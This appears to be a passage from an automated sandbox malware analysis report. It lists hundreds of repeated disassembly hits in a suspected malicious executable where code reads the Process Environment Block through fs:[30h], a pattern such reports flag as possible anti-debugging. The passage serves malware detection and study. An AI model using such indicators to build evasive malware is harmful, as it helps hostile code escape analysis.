          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
